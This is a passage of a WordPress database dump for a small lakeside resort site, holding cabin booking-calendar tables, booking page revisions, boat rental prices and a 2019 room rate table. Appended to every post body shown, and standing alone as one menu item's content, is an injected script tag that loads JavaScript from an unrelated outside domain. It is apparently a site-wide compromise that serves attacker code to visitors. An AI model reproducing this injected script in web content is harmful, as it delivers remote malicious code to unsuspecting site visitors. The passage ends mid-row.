6\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"6\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"KITCHENETTE 7\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"\",\"\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"7\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"VILLA 9\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"9\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"CABIN 10\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"10\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"CABIN 11\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"11\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"CABIN 12\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"12\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"CABIN 13\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"13\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"CABIN 14\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"14\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"]]<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Booking Calendar','Booking Calendar','inherit','closed','closed','','835-revision-v1','','','2019-06-16 16:08:44','2019-06-16 21:08:44','',835,'http://ashbyresort.com/835-revision-v1/',0,'revision','',0),(850,1,'2019-06-16 19:01:06','2019-06-17 00:01:06','[[\"\",\"6/29-7/5\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"7/6-7/12\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"7/13-7/19\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"7/20-7/26\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"7/27-8/2\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"T\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"T\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"T\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"T\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"T\",\"F\"],[\"KITCHENETTE1\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"\",\"\",\"X\",\"1\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"SLEEPER2\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"\",\"\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"2\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"KITCHENETTE3\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"X\",\"3\",\"X\",\"\",\"\",\"X\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\"],[\"SLEEPER4\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"4\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\"],[\"KITCHENETTE5\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"5\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"SLEEPER6\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"6\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"KITCHENETTE7\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"\",\"\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"7\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"VILLA9\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"9\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"CABIN10\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"10\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"CABIN11\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"11\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"CABIN12\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"12\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"CABIN13\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"13\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"CABIN14\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"14\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"]]<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Booking Calendar','Booking Calendar','inherit','closed','closed','','835-revision-v1','','','2019-06-16 19:01:06','2019-06-17 00:01:06','',835,'http://ashbyresort.com/835-revision-v1/',0,'revision','',0),(851,1,'2019-06-16 20:29:24','2019-06-17 01:29:24','<div id=\"pl-88\"  class=\"panel-layout\" ><div id=\"pg-88-0\"  class=\"panel-grid panel-no-style\" ><div id=\"pgc-88-0-0\"  class=\"panel-grid-cell\"  data-weight=\"0.772790055249\" ><div id=\"panel-88-0-0-0\" class=\"so-panel widget widget_text panel-first-child panel-last-child\" data-index=\"0\" data-style=\"{&quot;background_image_attachment&quot;:false,&quot;background_display&quot;:&quot;tile&quot;}\" ><h3 class=\"widget-title\">CALL FOR AVAILABILITY 218-747-2959.</h3>			<div class=\"textwidget\">Book your stay by calling (218) 747-2959. The calendar is up to date showing availability. You can also send a request for booking by filling out form on right and selecting the days you wish to stay in the calendar on the right.\nWe will call you to confirm Reservation.\nRemember that a deposit is required before a booking can be confirmed. Of course if you would prefer you can just call us to set up a reservation at (218) 747- 2959.\n\n</div>\n		</div></div><div id=\"pgc-88-0-1\"  class=\"panel-grid-cell\"  data-weight=\"0.227209944751\" ><div id=\"panel-88-0-1-0\" class=\"so-panel widget widget_bookingwidget panel-first-child panel-last-child\" data-index=\"1\" data-style=\"{&quot;background_image_attachment&quot;:false,&quot;background_display&quot;:&quot;tile&quot;}\" >[siteorigin_widget class=\"BookingWidget\"]<input type=\"hidden\" value=\"{&quot;instance&quot;:{&quot;booking_widget_title&quot;:&quot;&quot;,&quot;booking_widget_show&quot;:&quot;booking_form&quot;,&quot;booking_widget_calendar_count&quot;:&quot;1&quot;,&quot;booking_widget_last_field&quot;:&quot;&quot;,&quot;booking_widget_type&quot;:&quot;&quot;,&quot;so_sidebar_emulator_id&quot;:&quot;bookingwidget-85110001&quot;,&quot;option_name&quot;:&quot;widget_bookingwidget&quot;},&quot;args&quot;:{&quot;before_widget&quot;:&quot;&lt;div id=\\&quot;panel-88-0-1-0\\&quot; class=\\&quot;so-panel widget widget_bookingwidget panel-first-child panel-last-child\\&quot; data-index=\\&quot;1\\&quot; data-style=\\&quot;{&amp;quot;background_image_attachment&amp;quot;:false,&amp;quot;background_display&amp;quot;:&amp;quot;tile&amp;quot;}\\&quot; &gt;&quot;,&quot;after_widget&quot;:&quot;&lt;\\/div&gt;&quot;,&quot;before_title&quot;:&quot;&lt;h3 class=\\&quot;widget-title\\&quot;&gt;&quot;,&quot;after_title&quot;:&quot;&lt;\\/h3&gt;&quot;,&quot;widget_id&quot;:&quot;widget-0-1-0&quot;}}\" />[/siteorigin_widget]</div></div></div></div><script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Calendar','','inherit','closed','closed','','88-revision-v1','','','2019-06-16 20:29:24','2019-06-17 01:29:24','',88,'http://ashbyresort.com/88-revision-v1/',0,'revision','',0),(852,1,'2019-06-16 20:29:24','2019-06-17 01:29:24','<div id=\"pl-88\"  class=\"panel-layout\" ><div id=\"pg-88-0\"  class=\"panel-grid panel-no-style\" ><div id=\"pgc-88-0-0\"  class=\"panel-grid-cell\"  data-weight=\"0.772790055249\" ><div id=\"panel-88-0-0-0\" class=\"so-panel widget widget_text panel-first-child panel-last-child\" data-index=\"0\" data-style=\"{&quot;background_image_attachment&quot;:false,&quot;background_display&quot;:&quot;tile&quot;}\" ><h3 class=\"widget-title\">CALL FOR AVAILABILITY 218-747-2959.</h3>			<div class=\"textwidget\">Book your stay by calling (218) 747-2959. The calendar is up to date showing availability. You can also send a request for booking by filling out form on right and selecting the days you wish to stay in the calendar on the right.\nWe will call you to confirm Reservation.\nRemember that a deposit is required before a booking can be confirmed. Of course if you would prefer you can just call us to set up a reservation at (218) 747- 2959.\n\n</div>\n		</div></div><div id=\"pgc-88-0-1\"  class=\"panel-grid-cell\"  data-weight=\"0.227209944751\" ><div id=\"panel-88-0-1-0\" class=\"so-panel widget widget_bookingwidget panel-first-child panel-last-child\" data-index=\"1\" data-style=\"{&quot;background_image_attachment&quot;:false,&quot;background_display&quot;:&quot;tile&quot;}\" >[siteorigin_widget class=\"BookingWidget\"]<input type=\"hidden\" value=\"{&quot;instance&quot;:{&quot;booking_widget_title&quot;:&quot;&quot;,&quot;booking_widget_show&quot;:&quot;booking_form&quot;,&quot;booking_widget_calendar_count&quot;:&quot;1&quot;,&quot;booking_widget_last_field&quot;:&quot;&quot;,&quot;booking_widget_type&quot;:&quot;&quot;,&quot;so_sidebar_emulator_id&quot;:&quot;bookingwidget-8810001&quot;,&quot;option_name&quot;:&quot;widget_bookingwidget&quot;},&quot;args&quot;:{&quot;before_widget&quot;:&quot;&lt;div id=\\&quot;panel-88-0-1-0\\&quot; class=\\&quot;so-panel widget widget_bookingwidget panel-first-child panel-last-child\\&quot; data-index=\\&quot;1\\&quot; data-style=\\&quot;{&amp;quot;background_image_attachment&amp;quot;:false,&amp;quot;background_display&amp;quot;:&amp;quot;tile&amp;quot;}\\&quot; &gt;&quot;,&quot;after_widget&quot;:&quot;&lt;\\/div&gt;&quot;,&quot;before_title&quot;:&quot;&lt;h3 class=\\&quot;widget-title\\&quot;&gt;&quot;,&quot;after_title&quot;:&quot;&lt;\\/h3&gt;&quot;,&quot;widget_id&quot;:&quot;widget-0-1-0&quot;}}\" />[/siteorigin_widget]</div></div></div></div><script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Calendar','','inherit','closed','closed','','88-revision-v1','','','2019-06-16 20:29:24','2019-06-17 01:29:24','',88,'http://ashbyresort.com/88-revision-v1/',0,'revision','',0),(853,1,'2019-06-16 20:32:23','2019-06-17 01:32:23','<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Calendar','','publish','closed','closed','','calendar','','','2019-06-16 20:42:00','2019-06-17 01:42:00','',0,'http://ashbyresort.com/?p=853',17,'nav_menu_item','',0),(855,1,'2019-06-16 20:37:28','2019-06-17 01:37:28','<h4 style=\"text-align: center;\"><strong>X = Booked Dates in Upcoming Vacation Calendar<br /></strong></h4>		\n			<a href=\"http://ashbyresort.com/calendar/\" role=\"button\">\n						Book your vacation\n					</a>\n		<p>IBook your stay by calling (218) 747-2959. The calendar is up to date showing availability.</p><p>You can also send a request for booking by filling out this form below and selecting the days you wish to stay in the calendar on the right.<br />We will call you to confirm Reservation.<br />Remember that a deposit is required before a booking can be confirmed. <br />Of course if you would prefer you can just call us to set up a reservation at (218) 747- 2959.</p>[table id=3 /]<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','CSV Calendar','','inherit','closed','closed','','837-revision-v1','','','2019-06-16 20:37:28','2019-06-17 01:37:28','',837,'http://ashbyresort.com/837-revision-v1/',0,'revision','',0),(856,1,'2019-06-16 20:39:28','2019-06-17 01:39:28','<h4 style=\"text-align: center;\"><strong>X = Booked Dates in Upcoming Vacation Calendar<br /></strong></h4>		\n			<a href=\"http://ashbyresort.com/calendar/\" role=\"button\">\n						Request a Booking\n					</a>\n		<p>IBook your stay by calling (218) 747-2959. The calendar is up to date showing availability.</p>\n<p>You can also send a request for booking&nbsp; online by clicking Request a Booking above.<br>We will call you to confirm Reservation.<br>Remember that a deposit is required before a booking can be confirmed. <br>Of course if you would prefer you can just call us to set up a reservation at (218) 747- 2959.</p>[table id=3 /]<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','CSV Calendar','','inherit','closed','closed','','837-revision-v1','','','2019-06-16 20:39:28','2019-06-17 01:39:28','',837,'http://ashbyresort.com/837-revision-v1/',0,'revision','',0),(857,1,'2019-06-16 20:39:49','2019-06-17 01:39:49','<h4 style=\"text-align: center;\"><strong>X = Booked Dates in Upcoming Vacation Calendar<br /></strong></h4>		\n			<a href=\"http://ashbyresort.com/calendar/\" role=\"button\">\n						Request a Booking\n					</a>\n		<p>Book your stay by calling (218) 747-2959. The calendar is up to date showing availability.</p>\n<p>You can also send a request for booking&nbsp; online by clicking Request a Booking above.<br>We will call you to confirm Reservation.<br>Remember that a deposit is required before a booking can be confirmed. <br>Of course if you would prefer you can just call us to set up a reservation at (218) 747- 2959.</p>[table id=3 /]<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','CSV Calendar','','inherit','closed','closed','','837-revision-v1','','','2019-06-16 20:39:49','2019-06-17 01:39:49','',837,'http://ashbyresort.com/837-revision-v1/',0,'revision','',0),(858,1,'2019-06-16 20:40:17','2019-06-17 01:40:17','<h4 style=\"text-align: center;\"><strong>X = Booked Dates in Upcoming Vacation Calendar<br /></strong></h4>		\n			<a href=\"http://ashbyresort.com/calendar/\" role=\"button\">\n						Request a Booking\n					</a>\n		<p>Book your stay by calling (218) 747-2959. The calendar below is updated to date showing availability.</p>\n<p>You can also send a request for booking&nbsp; online by clicking Request a Booking above.<br>We will call you to confirm Reservation.<br>Remember that a deposit is required before a booking can be confirmed. <br>Of course if you would prefer you can just call us to set up a reservation at (218) 747- 2959.</p>[table id=3 /]<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','CSV Calendar','','inherit','closed','closed','','837-revision-v1','','','2019-06-16 20:40:17','2019-06-17 01:40:17','',837,'http://ashbyresort.com/837-revision-v1/',0,'revision','',0),(859,1,'2019-06-16 20:50:00','2019-06-17 01:50:00','<h4 style=\"text-align: center;\"><strong>X = Booked Dates in Ashby Resort Calendar<br /></strong></h4>		\n			<a href=\"http://ashbyresort.com/calendar/\" role=\"button\">\n						Request a Booking\n					</a>\n		<p>Book your stay by calling (218) 747-2959. The calendar below is updated to date showing availability.</p>\n<p>You can also send a request for booking&nbsp; online by clicking Request a Booking above.<br>We will call you to confirm Reservation.<br>Remember that a deposit is required before a booking can be confirmed. <br>Of course if you would prefer you can just call us to set up a reservation at (218) 747- 2959.</p>[table id=3 /]<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','CSV Calendar','','inherit','closed','closed','','837-revision-v1','','','2019-06-16 20:50:00','2019-06-17 01:50:00','',837,'http://ashbyresort.com/837-revision-v1/',0,'revision','',0),(860,1,'2019-06-16 20:50:55','2019-06-17 01:50:55','<h4 style=\"text-align: center;\"><strong>X = Booked Dates in Ashby Resort Calendar<br /></strong></h4>		\n			<a href=\"http://ashbyresort.com/calendar/\" role=\"button\">\n						Request a Booking\n					</a>\n		<p>Book your stay by calling (218) 747-2959. The calendar below is updated to show availability.</p><p>You can also send a request for booking  online by clicking Request a Booking above.<br />We will call you to confirm Reservation.<br />Remember that a deposit is required before a booking can be confirmed. <br />Of course if you would prefer you can just call us to set up a reservation at (218) 747- 2959.</p>[table id=3 /]<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','CSV Calendar','','inherit','closed','closed','','837-revision-v1','','','2019-06-16 20:50:55','2019-06-17 01:50:55','',837,'http://ashbyresort.com/837-revision-v1/',0,'revision','',0),(861,2,'2019-06-21 14:56:25','2019-06-21 19:56:25','[[\"\",\"6/29-7/5\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"7/6-7/12\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"7/13-7/19\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"7/20-7/26\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"7/27-8/2\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"T\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"T\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"T\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"T\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"T\",\"F\"],[\"KITCHENETTE1\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"\",\"\",\"X\",\"1\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"SLEEPER2\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"\",\"\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"2\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"KITCHENETTE3\",\"\",\"X\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"X\",\"3\",\"X\",\"\",\"\",\"X\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\"],[\"SLEEPER4\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"4\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\"],[\"KITCHENETTE5\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"5\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"SLEEPER6\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"6\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"KITCHENETTE7\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"\",\"\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"7\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"VILLA9\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"9\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"CABIN10\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"10\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"CABIN11\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"11\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"CABIN12\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"12\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"CABIN13\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"13\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"CABIN14\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"14\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"]]<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Booking Calendar','Booking Calendar','inherit','closed','closed','','835-revision-v1','','','2019-06-21 14:56:25','2019-06-21 19:56:25','',835,'http://ashbyresort.com/835-revision-v1/',0,'revision','',0),(862,2,'2019-06-22 08:14:39','2019-06-22 13:14:39','[[\"If Available\",\"Daily\",\"Weekly\",\"\"],[\"14\' Lund Boat\",\"$20.00\",\"$100.00\",\"\"],[\"15 H.P. 4 Stroke Yamaha Motor\",\"$30.00\",\"$150.00\",\"Plus Gas\"],[\"Boat and Motor\",\"$50.00\",\"$250.00\",\"Plus Gas\"],[\"20\' Pontoon with 25 H.P. Motor\",\"$150.00\",\"$500.00\",\"Plus Gas\"],[\"Paddle Boards, Paddle boat, Kayaks, Canoes\",\"FREE\",\"FREE\",\"\"],[\"Boat Lifts\",\"$20.00\",\"$100.00\",\"\"],[\"Boat Launching/Docking\",\"\",\"\",\"$10.00 One time Fee\"]]<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Equipment Rentals','','inherit','closed','closed','','692-revision-v1','','','2019-06-22 08:14:39','2019-06-22 13:14:39','',692,'http://ashbyresort.com/692-revision-v1/',0,'revision','',0),(863,2,'2019-06-22 08:19:26','2019-06-22 13:19:26','[[\"2019\",\"Bedrooms\",\"Weekday Nightly\",\"Weekend Holiday Nightly\",\"Weekly Sept. \\u2013 May\",\"Weekly June \\u2013 Aug.\",\"Maximum Capacity\"],[\"Sleepers Motel\",\"1\",\"$85.00\",\"$95.00\",\"$450.00\",\"$550.00\",\"4\\n\"],[\"Kitchenettes Motel\",\"1\",\"$100.00\",\"$130.00\",\"$600.00\",\"$700.00\",\"4\"],[\"Suite 9\",\"2\",\"$180.00\",\"$230.00\",\"$900.00\",\"$1,125.00\",\"4\"],[\"Cabins (#10 #11 #12)\",\"2\",\"$180.00\",\"$230.00\",\"$900.00\",\"$1,125.00\",\"8\"],[\"Cabins (#13 #14)\",\"2\",\"$200.00\",\"$250.00\",\"$1,000.00\",\"$1,225.00\",\"8\"],[\"Camping non-electric\",\"1 per site\",\"$35.00\",\"$35.00\",\"$180.00\",\"$180.00\",\"\"],[\"Camping with electric\",\"1\\u00a0 per site\\n\",\"$45.00\",\"$45.00\",\"$250.00\",\"$250.00\",\"\"],[\"Pets (one pet per campsite)\",\"\",\"$8.00\",\"$8.00\",\"$40.00\",\"$40.00\",\"\"],[\"Additional People Camping 